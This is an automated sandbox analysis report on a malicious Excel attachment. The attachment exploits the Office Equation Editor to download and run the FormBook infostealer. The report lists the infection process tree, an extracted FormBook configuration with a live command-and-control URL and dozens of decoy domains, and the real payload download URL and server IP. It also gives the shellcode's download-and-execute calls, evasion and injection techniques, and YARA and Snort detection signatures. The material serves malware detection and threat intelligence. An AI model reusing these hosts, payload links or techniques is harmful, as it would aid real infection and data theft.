Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ-T56797W_1.xlsx

Overview

General Information

Sample Name:RFQ-T56797W_1.xlsx
Analysis ID:1342301
MD5:138d7d8a55bef05ac6368488b3c9630d
SHA1:f9e93ed382d3005a7575443369207f2c3339309b
SHA256:25e7a5ff8ca830bccda9a6617b31fb3992d4f780444cf3adc8cfb8056f26dd58
Tags:xlsx
Infos:

Detection

FormBook, NSISDropper
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected NSISDropper
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2028 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 260 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 2204 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: AFFC03992E31B5D4324B41CBD40D911E)
      • oktuxvhtsq.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" MD5: CF92A3EC74E407574A58BCF121BEC4F1)
        • oktuxvhtsq.exe (PID: 1516 cmdline: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe MD5: CF92A3EC74E407574A58BCF121BEC4F1)
          • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • autochk.exe (PID: 2148 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: F88A52EB62019D6A62FDD9E08034DBD8)
            • chkdsk.exe (PID: 2052 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)
              • cmd.exe (PID: 1932 cmdline: /c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fakeittilyoumakeitfinance.com/ge06/"], "decoy": ["azaharparis.com", "nationaleventsafety.com", "covesstudy.com", "quinshon4.com", "moderco.net", "trailblazerbaby.com", "time-edu.net", "azeemtourism.com", "anakmedan3.click", "bookinternationaltours.com", "ulksht.top", "newswirex.com", "dingg.net", "waveoflife.pro", "miamirealestatecommercial.com", "rtplive77.xyz", "bowllywood.com", "automation-tools-84162.bond", "booptee.com", "ebx.lat", "gdlongzhong.icu", "seoulbeautytw.com", "bulgarianarchive.com", "pojipoji.com", "mochibees-wylie.com", "ecoboat.world", "eroyfw.top", "centralngs.com", "youtube-manager.site", "eatlust.com", "geutik.cfd", "credit-cards-16215.bond", "lodsoab.com", "jon188.ink", "52iwin.win", "juanmafit.com", "gamemuggaz.com", "oneresi.com", "pj69vip12.cyou", "west-paws.com", "chaineccn.com", "mentiti.com", "modeparisiennefr.com", "skyboxpro.net", "versebuild.xyz", "luxpsy.com", "nivaarnalawgroup.com", "c091627.com", "preppal.shop", "narrativepages.com", "yqsoysy.com", "diverseindiatours.com", "batcavela.com", "ayyp300.top", "daqtpt.cfd", "livers-guardplus.com", "chucobuilt.net", "qianxz109.xyz", "carat-automotive.com", "hndswicco.best", "workwithray.live", "sxchenggu.com", "sanpan010.com", "fufe066.xyz"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bb:$s1: <legacyDrawing r:id="
  • 0x1e3:$s2: <oleObject progId="
  • 0x22b:$s3: autoLoad="true"

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 35 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.oktuxvhtsq.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.oktuxvhtsq.exe.400000.2.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.oktuxvhtsq.exe.400000.2.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          7.2.oktuxvhtsq.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          7.2.oktuxvhtsq.exe.400000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 41.185.64.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 260, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 260, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exe

          Snort Signatures

          Timestamp:192.168.2.2238.11.36.6849167802031412 11/14/23-13:28:23.777818
          SID:2031412
          Source Port:49167
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2291.195.240.1949166802031412 11/14/23-13:28:02.320328
          SID:2031412
          Source Port:49166
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22103.224.212.21249164802031412 11/14/23-13:27:01.556896
          SID:2031412
          Source Port:49164
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.223.33.130.19049168802031412 11/14/23-13:28:45.165462
          SID:2031412
          Source Port:49168
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2234.149.87.4549169802031412 11/14/23-13:29:05.883659
          SID:2031412
          Source Port:49169
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2241.185.64.15549162802021697 11/14/23-13:26:24.263209
          SID:2021697
          Source Port:49162
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.sxchenggu.com/ge06/www.centralngs.comAvira URL Cloud: Label: malware
          Source: http://www.miamirealestatecommercial.com/ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41Avira URL Cloud: Label: malware
          Source: http://www.centralngs.comAvira URL Cloud: Label: malware
          Source: http://www.pj69vip12.cyou/ge06/www.miamirealestatecommercial.comAvira URL Cloud: Label: malware
          Source: http://www.bowllywood.com/ge06/www.moderco.netAvira URL Cloud: Label: malware
          Source: http://www.versebuild.xyz/ge06/Avira URL Cloud: Label: phishing
          Source: http://www.sxchenggu.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.bulgarianarchive.com/ge06/www.hndswicco.bestAvira URL Cloud: Label: malware
          Source: http://www.fakeittilyoumakeitfinance.comAvira URL Cloud: Label: phishing
          Source: http://www.fakeittilyoumakeitfinance.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.narrativepages.comAvira URL Cloud: Label: malware
          Source: http://www.credit-cards-16215.bondAvira URL Cloud: Label: phishing
          Source: http://www.sxchenggu.comAvira URL Cloud: Label: malware
          Source: http://www.hndswicco.bestAvira URL Cloud: Label: malware
          Source: http://www.bulgarianarchive.comAvira URL Cloud: Label: phishing
          Source: http://www.sxchenggu.com/ge06/?6l58L2=0+Pk4QqMeOZthSuOlE3hLercqAjKj7AZkI6NQZ8fzlVSI648NH9aZsaxoIAU5h7921vkYw==&BL3=KP-PB41Avira URL Cloud: Label: malware
          Source: http://www.west-paws.comAvira URL Cloud: Label: phishing
          Source: http://www.daqtpt.cfd/ge06/Avira URL Cloud: Label: malware
          Source: http://www.narrativepages.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.miamirealestatecommercial.com/ge06/www.bowllywood.comAvira URL Cloud: Label: malware
          Source: http://mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shelAvira URL Cloud: Label: malware
          Source: http://www.pj69vip12.cyouAvira URL Cloud: Label: phishing
          Source: http://www.west-paws.com/ge06/www.pj69vip12.cyouAvira URL Cloud: Label: malware
          Source: http://www.west-paws.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.credit-cards-16215.bond/ge06/Avira URL Cloud: Label: malware
          Source: http://www.miamirealestatecommercial.comAvira URL Cloud: Label: malware
          Source: http://www.centralngs.com/ge06/www.west-paws.comAvira URL Cloud: Label: malware
          Source: http://www.hndswicco.best/ge06/Avira URL Cloud: Label: malware
          Source: http://www.west-paws.com/ge06/?6l58L2=0AfOVuqZSJfRN5GiS/+VmpnTwyRml/2OLwKSVYenXKtwNMi61Jg0OdgGHf2AFfl8gIxxQw==&BL3=KP-PB41Avira URL Cloud: Label: malware
          Source: http://www.bowllywood.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.moderco.net/ge06/Avira URL Cloud: Label: malware
          Source: http://www.pj69vip12.cyou/ge06/Avira URL Cloud: Label: malware
          Source: http://www.ecoboat.world/ge06/Avira URL Cloud: Label: malware
          Source: http://www.bulgarianarchive.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.centralngs.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.centralngs.com/ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41Avira URL Cloud: Label: malware
          Source: http://www.credit-cards-16215.bond/ge06/www.versebuild.xyzAvira URL Cloud: Label: malware
          Source: http://www.ecoboat.world/ge06/www.bulgarianarchive.comAvira URL Cloud: Label: malware
          Source: http://www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41Avira URL Cloud: Label: malware
          Source: http://mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exeAvira URL Cloud: Label: malware
          Source: http://www.bowllywood.comAvira URL Cloud: Label: malware
          Source: http://www.miamirealestatecommercial.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.moderco.net/ge06/www.daqtpt.cfdAvira URL Cloud: Label: malware
          Source: http://www.narrativepages.com/ge06/www.credit-cards-16215.bondAvira URL Cloud: Label: malware
          Source: http://www.versebuild.xyzAvira URL Cloud: Label: malware
          Source: http://www.daqtpt.cfd/ge06/www.ecoboat.worldAvira URL Cloud: Label: malware
          Source: http://www.hndswicco.best/ge06/www.fakeittilyoumakeitfinance.comAvira URL Cloud: Label: malware
          Source: www.fakeittilyoumakeitfinance.com/ge06/Avira URL Cloud: Label: malware
          Source: http://www.ecoboat.worldAvira URL Cloud: Label: phishing
          Found malware configuration
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.fakeittilyoumakeitfinance.com/ge06/"], "decoy": ["azaharparis.com", "nationaleventsafety.com", "covesstudy.com", "quinshon4.com", "moderco.net", "trailblazerbaby.com", "time-edu.net", "azeemtourism.com", "anakmedan3.click", "bookinternationaltours.com", "ulksht.top", "newswirex.com", "dingg.net", "waveoflife.pro", "miamirealestatecommercial.com", "rtplive77.xyz", "bowllywood.com", "automation-tools-84162.bond", "booptee.com", "ebx.lat", "gdlongzhong.icu", "seoulbeautytw.com", "bulgarianarchive.com", "pojipoji.com", "mochibees-wylie.com", "ecoboat.world", "eroyfw.top", "centralngs.com", "youtube-manager.site", "eatlust.com", "geutik.cfd", "credit-cards-16215.bond", "lodsoab.com", "jon188.ink", "52iwin.win", "juanmafit.com", "gamemuggaz.com", "oneresi.com", "pj69vip12.cyou", "west-paws.com", "chaineccn.com", "mentiti.com", "modeparisiennefr.com", "skyboxpro.net", "versebuild.xyz", "luxpsy.com", "nivaarnalawgroup.com", "c091627.com", "preppal.shop", "narrativepages.com", "yqsoysy.com", "diverseindiatours.com", "batcavela.com", "ayyp300.top", "daqtpt.cfd", "livers-guardplus.com", "chucobuilt.net", "qianxz109.xyz", "carat-automotive.com", "hndswicco.best", "workwithray.live", "sxchenggu.com", "sanpan010.com", "fufe066.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: RFQ-T56797W_1.xlsxReversingLabs: Detection: 63%
          Source: RFQ-T56797W_1.xlsxVirustotal: Detection: 54%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sample
          Source: RFQ-T56797W_1.xlsxAvira: detected
          Multi AV Scanner detection for domain / URL
          Source: centralngs.comVirustotal: Detection: 14%Perma Link
          Source: mail.treeoflifeadventures.comVirustotal: Detection: 17%Perma Link
          Source: www.miamirealestatecommercial.comVirustotal: Detection: 12%Perma Link
          Source: www.narrativepages.comVirustotal: Detection: 13%Perma Link
          Source: www.sxchenggu.comVirustotal: Detection: 12%Perma Link
          Source: www.credit-cards-16215.bondVirustotal: Detection: 13%Perma Link
          Source: www.centralngs.comVirustotal: Detection: 13%Perma Link
          Source: www.pj69vip12.cyouVirustotal: Detection: 12%Perma Link
          Source: www.west-paws.comVirustotal: Detection: 11%Perma Link
          Source: www.luxpsy.comVirustotal: Detection: 11%Perma Link
          Source: http://www.centralngs.comVirustotal: Detection: 13%Perma Link
          Source: http://www.moderco.netVirustotal: Detection: 8%Perma Link
          Source: http://www.daqtpt.cfdVirustotal: Detection: 5%Perma Link
          Source: http://www.fakeittilyoumakeitfinance.comVirustotal: Detection: 13%Perma Link
          Source: http://www.narrativepages.comVirustotal: Detection: 13%Perma Link
          Source: http://www.credit-cards-16215.bondVirustotal: Detection: 13%Perma Link
          Source: http://www.hndswicco.bestVirustotal: Detection: 11%Perma Link
          Source: http://www.sxchenggu.comVirustotal: Detection: 12%Perma Link
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeJoe Sandbox ML: detected

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Office equation editor establishes network connection
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 41.185.64.155 Port: 80Jump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: chkdsk.pdb source: oktuxvhtsq.exe, 00000007.00000002.420661230.0000000000240000.00000040.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420667702.0000000000274000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849693334.00000000005E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: oktuxvhtsq.exe, oktuxvhtsq.exe, 00000007.00000003.411866541.0000000000430000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420725396.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000003.412146879.0000000000590000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000003.420901641.0000000001D10000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000003.421285502.0000000001E70000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849798315.0000000002180000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: D:\xampp\htdocs\d97f8e9e1ea74988993ee47b9f946ba8\Loader\Release\Loader.pdb source: word.exe, 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415689010.0000000002390000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000006.00000000.410185124.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000007.00000000.411311230.000000000042E000.00000002.00000001.01000000.00000006.sdmp, explorer.exe, 00000008.00000002.851097210.000000000870F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849622577.00000000003A3000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000024FF000.00000004.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe.5.dr
          Source: Binary string: D:\xampp\htdocs\d97f8e9e1ea74988993ee47b9f946ba8\Loader\Release\Loader.pdb& source: word.exe, 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415689010.0000000002390000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000006.00000000.410185124.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000007.00000000.411311230.000000000042E000.00000002.00000001.01000000.00000006.sdmp, explorer.exe, 00000008.00000002.851097210.000000000870F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849622577.00000000003A3000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000024FF000.00000004.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe.5.dr
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405E93 FindFirstFileA,FindClose,5_2_00405E93
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004054BD
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402671 FindFirstFileA,5_2_00402671
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004016D0 FindFirstFileW,FindNextFileW,FindClose,6_2_004016D0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0042478A FindFirstFileExW,6_2_0042478A

          Software Vulnerabilities

          barindex
          Shellcode detected
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036BBABB ExitProcess,2_2_036BBABB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036BBA9B WinExec,ExitProcess,2_2_036BBA9B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036BB92B LoadLibraryW,URLDownloadToFileW,2_2_036BB92B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036BBA50 URLDownloadToFileW,2_2_036BBA50
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036BB953 URLDownloadToFileW,2_2_036BB953
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
